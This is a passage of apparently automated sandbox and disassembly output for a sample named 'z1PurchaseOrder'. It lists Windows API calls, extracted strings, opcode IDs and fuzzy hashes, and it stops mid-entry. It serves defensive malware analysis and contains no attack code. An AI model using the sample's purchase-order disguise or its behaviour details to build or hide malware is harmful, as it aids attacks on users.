                                        • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                        • String ID: 0
                                        • API String ID: 1663942905-4108050209
                                        • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                        • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                        • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                        • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                        • String ID:
                                        • API String ID: 1481289235-0
                                        • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                        • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                        • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                        • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                        APIs
                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                        • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                        • SendMessageW.USER32 ref: 0046FBAF
                                        • SendMessageW.USER32 ref: 0046FBE2
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                        • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                        • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                        • SendMessageW.USER32 ref: 0046FD00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                        • String ID:
                                        • API String ID: 2632138820-0
                                        • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                        • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                        • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                        • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                        APIs
                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                        • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CursorLoad
                                        • String ID:
                                        • API String ID: 3238433803-0
                                        • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                        • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                        • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                        • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                        • _wcslen.LIBCMT ref: 00460B00
                                        • __swprintf.LIBCMT ref: 00460B9E
                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                        • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                        • GetWindowRect.USER32(?,?), ref: 00460D21
                                        • GetParent.USER32(?), ref: 00460D40
                                        • ScreenToClient.USER32(00000000), ref: 00460D47
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                        • String ID: %s%u
                                        • API String ID: 1899580136-679674701
                                        • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                        • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                        • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                        • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                        APIs
                                        • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                        • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                        • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                        • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: FreeFromStringTask_wcslen$_wcscpy
                                        • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                        • API String ID: 2485709727-934586222
                                        • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                        • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                        • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                        • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                        • String ID: HH
                                        • API String ID: 3381189665-2761332787
                                        • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                        • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                        • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                        • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                        APIs
                                        • GetDC.USER32(00000000), ref: 00434585
                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                        • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                        • SelectObject.GDI32(00000000,?), ref: 004345A9
                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                        • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                        • String ID: (
                                        • API String ID: 3300687185-3887548279
                                        • Opcode ID: f1a61bd92dc1e5bf4a907c179000b9c6a14a2e3466c3eeb116f883cf8bb2fa69
                                        • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                        • Opcode Fuzzy Hash: f1a61bd92dc1e5bf4a907c179000b9c6a14a2e3466c3eeb116f883cf8bb2fa69
                                        • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                        APIs
                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                        • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                        • __swprintf.LIBCMT ref: 0045E4D9
                                        • _printf.LIBCMT ref: 0045E595
                                        • _printf.LIBCMT ref: 0045E5B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: LoadString_printf$__swprintf_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                        • API String ID: 3590180749-2894483878
                                        • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                        • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                        • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                        • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                        APIs
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                        • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                        • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                        • DeleteObject.GDI32(?), ref: 0046F950
                                        • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                        • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                        • DeleteObject.GDI32(?), ref: 0046F9CF
                                        • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                        • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                        • DestroyIcon.USER32(?), ref: 0046FA4F
                                        • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                        • DeleteObject.GDI32(?), ref: 0046FA68
                                        • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                        • String ID:
                                        • API String ID: 3412594756-0
                                        • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                        • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                        • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                        • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                        APIs
                                          • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                          • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                        • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                        • API String ID: 4013263488-4113822522
                                        • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                        • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                        • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                        • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                        • String ID:
                                        • API String ID: 228034949-0
                                        • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                        • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                        • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                        • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                        • GlobalLock.KERNEL32(00000000), ref: 00433523
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                        • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                        • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                        • DeleteObject.GDI32(?), ref: 00433603
                                        • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                        • String ID:
                                        • API String ID: 3969911579-0
                                        • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                        • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                        • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                        • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                        APIs
                                        • GetParent.USER32 ref: 00445A8D
                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                        • __wcsicoll.LIBCMT ref: 00445AC4
                                        • __wcsicoll.LIBCMT ref: 00445AE0
                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __wcsicoll$ClassMessageNameParentSend
                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                        • API String ID: 3125838495-3381328864
                                        • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                        • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                        • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                        • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CopyVariant$ErrorLast
                                        • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                        • API String ID: 2286883814-4206948668
                                        • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                        • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                        • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                        • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                        APIs
                                          • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                          • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                        • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                        • _wcscpy.LIBCMT ref: 00475F18
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: BuffCharDriveLowerType_wcscpy_wcslen
